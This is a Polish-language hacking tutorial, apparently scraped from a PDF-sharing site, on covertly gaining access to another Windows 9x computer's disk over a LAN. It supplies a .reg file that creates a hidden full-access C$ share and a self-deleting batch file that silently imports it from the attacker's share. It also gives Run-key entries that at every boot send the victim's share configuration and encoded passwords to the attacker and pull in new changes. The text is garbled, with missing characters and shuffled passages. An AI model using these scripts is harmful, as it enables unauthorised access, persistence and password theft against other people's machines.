Jak dostać się do dysku innego komputera w sieci, Technika, dla hakera

[ Pobierz całość w formacie PDF ]
Chyba ka dy z nas mia ju kiedy do czynienia z rejestrem systemowym. Poprzez
wpisywanie odpowiednich kluczy i warto ci mo na ca kowicie zrekonfigurowa Windowsa i
znacznie ograniczy dost p do zasobów komputera. W kluczu:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Network\LanMan\
[nazwa udost pnionego foldera lub drukarki]
zapisana jest konfiguracja wszystkich udost pnionych zasobów na naszym komputerze
(folderów i drukarek). W kluczu tym znajduj si nast puj ce zmienne :
Flags
o
101, 191 - folder udost pniony tylko do odczytu
o
103, 193 - folder udost pniony w zale no ci od podanego has a
Parm1enc, Parm2enc
- zakodowane has a (maks. 8 liter)
Path
- cie ka dost pu do folderu
Remark
- opis
Type
-
o
0 dla folderów
o
1 dla drukarek.
Tak wygl da zapis przyk adowej konfiguracji udzia u o nazwie 'instal'.
Manipuluj c tymi warto ciami atwo zmienia konfiguracje udost pnie na swoim komputerze,
ale jak wykorzystuj c rejestr systemowy aby zmieni i/lub odczyta konfiguracje innego
komputera w sieci. Bardzo prymitywnym sposobem jest podsuni cie komu w sieci zwyk ego
pliku rejestru. Np. takiego :
------in.reg------
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Network\LanMan\C$]
"Flags"=dword:00000192
"Type"=dword:00000000
"Path"="C:\\"
"Parm2enc"=hex:
dlatego zdecydowa em si j opisa .
Metoda ta jest ju troch przestarza a i atwa do wykrycia (aczkolwiek ci gle skuteczna),
Jak dosta si do dysku innego komputera w sieci
wykorzystuj c dziury w systemie ?
o
102, 192 - folder udost pniony do odczytu i zapisu
"Parm1enc"=hex:
"Remark"=""
----- - - -----
Wzór pliku
in.reg
mo na bardzo atwo uzyska eksportuj c z rejestru zapis dowolnego
udost pnienia. Pó niej wystarczy odpowiednio go zmodyfikowa (zmieni nazw udzia u,
cie k dost pu itd.)
Kiedy u ytkownik na innym komputerze uruchomi ten plik (domy lnie -
scalaj
) wówczas
informacje zostan wprowadzone do rejestru systemowego. Po ponownym starcie systemu
na komputerze ofiary b dziemy mieli swobodny dost p do jego dysku C (znaczek '$' przy
nazwie udost pnienia oznacza, e udzia nie b dzie widoczny w Otoczeniu Sieciowym). Jak
ju wspomnia em metoda ta jest bardzo prymitywna cho by ze wzgl du na komunikat, który
pojawi si na ekranie komputera informuj cy o wprowadzeniu zmiennych do rejestru. Dlatego
powinni my zadba o to aby program
regedit.exe
by uruchamiany z parametrem /s - to
zapewni nam dyskrecje. Mo na to zrobi wykorzystuj c plik bat :
-----start.bat-----
regedit.exe /s \\MAX\TAJNY$\in.reg
del start.bat
----- - - -----
MAX - nazwa naszego komputera
TAJNY$ - przyk adowe udost pnienie, które musimy utworzy i do którego nale y przegra
plik
in.reg
Wówczas u ytkownikowi podsuwamy tylko plik
start.bat
, po uruchomieniu którego
zawarto
in.reg
zostanie wprowadzona do rejestru. Podobnie bardzo atwo mo na
wyci gn zapis konfiguracji udost pnionych folderów z innego komputera w sieci (,takiego
który swe zasoby ma zabezpieczone has em, bo tylko wtedy ma to sens) :
-----start.bat-----
regedit.exe /s /e \\MAX\TAJNY$\out.reg
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan
del start.bat
----- - - -----
TAJNY$ - w tym przypadku musi by ustawiony jako 'pe en dost p'
Powy sze dwa sposoby daj nam mo liwo ci jednorazowej zmiany lub jednorazowego
pobrania informacji z rejestru. Ale co zrobi , eby za ka dym razem nie zmusza u ytkownika
do uruchamiania bata ? W tym celu nale y wykorzysta inny klucz w rejestrze :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Tam w a nie zapisane s cie ki wszystkich programów, które uruchamiane s po starcie
systemu. Do tego klucza musimy wprowadzi odpowiednie zmienne, które zapewni nam
sta y dost p do rejestru systemowego innego komputera. W tym celu mo emy wykorzysta
opisan wy ej metod (pliku bat). Plik
in.reg
powinien wygl da nast puj co :
------in.reg------
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"WinStart"="regedit.exe /s /e \\\\MAX\\TAJNY$\\out.reg
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan"
"WinStart2"="if exist \\\\MAX\\TAJNY$\\in.reg regedit.exe /s
\\\\MAX\\TAJNY$\\out.reg"
----- - - -----
Po wprowadzeniu zawarto ci pliku
in.reg
do rejestru systemowego ofiary pierwsza
zmienna :
"WinStart"="regedit.exe /s /e \\\\MAX\\TAJNY$\\out.reg
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan"
sprawi, e zawsze przy starcie systemu na komputerze ofiary Windows zapisze ca
konfiguracje udost pnionych folderów i drukarek w pliku
out.reg
na naszym dysku. Je eli w
tym czasie udzia
\\MAX\TAJNY$
nie b dzie dost pny (np. je eli nasz komputer b dzie
wy czony) wówczas start systemu opó ni si o oko o 1 sekund . Zapis drugiej zmiennej jest
troch bardziej skomplikowany :
"WinStart2"="if exist \\\\MAX\\TAJNY$\\in.reg regedit.exe /s
\\\\MAX\\TAJNY$\\in.reg"
Podobnie jak w przypadku pierwszej zmiennej zawsze, gdy system b dzie adowany zostanie
uruchomiony program
regedit.exe
i wprowadzi do rejestru systemowego ofiary zmienne
znajduj ce si w pliku
in.reg
na naszym dysku. Jednak e tutaj jest to troch bardziej
skomplikowane. Gdy program nie znalaz by pliku in.reg (np. gdy b dziemy mieli wy czony
komputer) na ekranie komputera ofiary pojawi by si komunikat o b dzie. Aby tego unikn
przed uruchomieniem
regedit.exe
konieczne jest sprawdzenie czy istnieje taki plik.
Dlatego warto zmiennej ma posta :
if exist nazwapliku polecenie
a u ytkownik w sieci w czy komputer,
b d zrestartuje system. Wówczas tak e b dziemy mogli odczyta zapis konfiguracji
udost pnionych folderów, a co za tym idzie - has a, które po starcie systemu znajd si w
pliku
out.reg
, na naszym dysku. Trzeba jednak pami ta o tym, e istnieje program
"Monitor sieci", który pokazuje wszystkie komputery w sieci pod czone do zasobów
okre lonego kompa.
Teraz, gdy tylko b dziemy chcieli wprowadzi jakie zmiany w konfiguracji udost pnionych
folderów w komputerze ofiary wystarczy przygotowa odpowiedni plik
in.reg
, przegra go
do folderu, który udost pniamy - TAJNY$ i poczeka ,
[ Pobierz całość w formacie PDF ]

  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • mexxo.keep.pl